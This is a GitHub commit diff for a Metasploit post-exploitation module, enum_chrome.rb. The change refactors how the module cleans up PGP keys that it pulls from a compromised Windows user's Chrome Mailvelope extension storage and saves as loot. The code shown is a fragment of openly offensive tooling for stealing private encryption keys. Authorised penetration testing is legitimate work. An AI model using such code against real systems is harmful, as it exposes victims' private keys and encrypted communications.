Skip to content

Commit

Permalink
use gsub instead of split/join
Browse files Browse the repository at this point in the history
  • Loading branch information
@mubix
mubix committed May 10, 2013
1 parent 2f543d3 commit 25f7af4
Showing 1 changed file with 8 additions and 4 deletions.
12 changes: 8 additions & 4 deletions modules/post/windows/gather/enum_chrome.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -40,7 +40,11 @@ def initialize(info={})
], self.class)
end

def extension_parse_mailvelope(username, extname)
def extension_mailvelope_parse_key(data)
return data.gsub("\x00","").tr("[]","").gsub("\\r","").gsub("\"","").gsub("\\n","\n")
end

def extension_mailvelope(username, extname)
chrome_path = @profiles_path + "\\" + username + @data_path
maildb_path = chrome_path + "/Local Storage/chrome-extension_#{extname}_0.localstorage"
begin
Expand All @@ -64,7 +68,7 @@ def extension_parse_mailvelope(username, extname)
keys = res["value"].split(",")
print_good("==> Found #{keys.size} private key(s)!")
keys.each do |key|
privkey = key.split("\x00").join.tr("[]","").split("\\r").join.split("\"").join.split("\\n").join("\n")
privkey = extension_mailvelope_parse_key(key)
vprint_good(privkey)
path = store_loot("chrome.mailvelope.privkey", "text/plain", session, privkey, "privkey.key", "Mailvelope PGP Private Key")
print_status("==> Saving private key to: #{path}")
Expand All @@ -74,7 +78,7 @@ def extension_parse_mailvelope(username, extname)
keys = res["value"].split(",")
print_good("==> Found #{keys.size} public key(s)!")
keys.each do |key|
pubkey = key.split("\x00").join.tr("[]","").split("\\r").join.split("\"").join.split("\\n").join("\n")
pubkey = extension_mailvelope_parse_key(key)
vprint_good(pubkey)
path = store_loot("chrome.mailvelope.pubkey", "text/plain", session, pubkey, "pubkey.key", "Mailvelope PGP Public Key")
print_status("==> Saving public key to: #{path}")
Expand All @@ -97,7 +101,7 @@ def parse_prefs(username, filepath)
print_status("=> #{values['manifest']['name']}")
if values['manifest']['name'] =~ /mailvelope/i
print_good("==> Found Mailvelope extension, extracting PGP keys")
extension_parse_mailvelope(username, name)
extension_mailvelope(username, name)
end
end
end
Expand Down

0 comments on commit 25f7af4

Please sign in to comment.